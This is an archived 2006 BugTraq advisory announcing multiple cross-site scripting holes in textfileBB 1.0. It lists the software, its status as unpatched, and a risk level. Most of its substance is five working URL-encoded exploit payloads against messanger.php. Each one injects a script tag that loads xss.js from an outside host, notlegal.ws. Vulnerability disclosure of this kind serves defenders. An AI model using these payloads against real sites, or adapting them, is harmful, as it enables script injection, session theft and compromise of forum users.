BugTraq
textfileBB <= 1.0 Multiple XSS Mar 08 2006 03:36AM
retard 30gigs com
ORIGIONAL: http://notlegal.ws/textfilebbmessanger.txt

software: textfileBB
vendors website: http://tfbb.jcink.com/
versions: <= 1.0
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard
risk level: medium

exploit(s):

http://example.com/messanger.php?mess=%3Cscript%20src=http://notlegal.ws
/xss.js%3E%3C/script%3E
http://example.com/messanger.php?p=MSN&user=%3Cscript%20src=http://notle
gal.ws/xss.js%3E%3C/script%3E
http://example.com/messanger.php?p=YIM&user=%3Cscript%20src=http://notle
gal.ws/xss.js%3E%3C/script%3E
http://example.com/messanger.php?p=ICQ&user=%3Cscript%20src=http://notle
gal.ws/xss.js%3E%3C/script%3E
http://example.com/messanger.php?p=AIM&user=%22%3E%3C/head%3E%3Cbody%3E%
3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/body%3E%3C/html%3E

credit:

author(s): retard
email: retard (at) 30gigs (dot) com [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus